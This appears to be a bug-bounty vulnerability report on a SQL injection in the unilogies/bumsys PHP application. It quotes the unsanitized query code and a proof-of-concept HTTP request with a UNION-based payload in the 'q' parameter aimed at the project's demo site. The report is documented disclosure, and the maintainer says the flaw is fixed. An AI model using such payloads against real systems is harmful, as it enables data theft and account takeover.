SQL Injection in unilogies/bumsys

Valid

Reported on

Mar 5th 2023

Description

In '/core/ajax/ajax_select2.php#L989'

"is_trash = 0 and date(batch_expiry_date) >= curdate() and batch_number LIKE '". $search ."%'"

$search from:

    $search = isset($_GET['q']) ? $_GET['q'] : "";

no sanitize.

Poc

GET /info/?module=select2&page=batchList&q=1'union/*%23&pid=1*/select+111,222%23 HTTP/1.1
Host: demo.bumsys.org
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/109.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/json; charset=utf-8
X-CSRF-TOKEN: 362b7f15990a766dde434ec43519db3daede216f
X-Requested-With: XMLHttpRequest
Connection: keep-alive
Referer: https://demo.bumsys.org/home/
Cookie: __c56ed801e959f2a2fda4de832eed05a0e7282e6a=cvv12rvqd8nnvdpv5e5a0g3903; __681be8b1f633295b0ca7f80a382ce1421cc19860=17obctlf4ebl2k45mj6rasskq3; eid=1; currencySymbol=%E0%A7%B3; keepAlive=1
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

Impact

info leaking takeover admin account rce other vector

We are processing your report and will contact the unilogies/bumsys team within 24 hours. 3 months ago
We have contacted a member of the unilogies/bumsys team and are waiting to hear back 3 months ago
unilogies/bumsys maintainer validated this vulnerability 3 months ago
ka1n4t has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Khurshid Alam marked this as fixed in 2.2.0 with commit 1b426f a month ago
Khurshid Alam has been awarded the fix bounty
This vulnerability will not receive a CVE
Khurshid Alam published this vulnerability a month ago
Khurshid Alam
a month ago

Maintainer

Thank you so much.

to join this conversation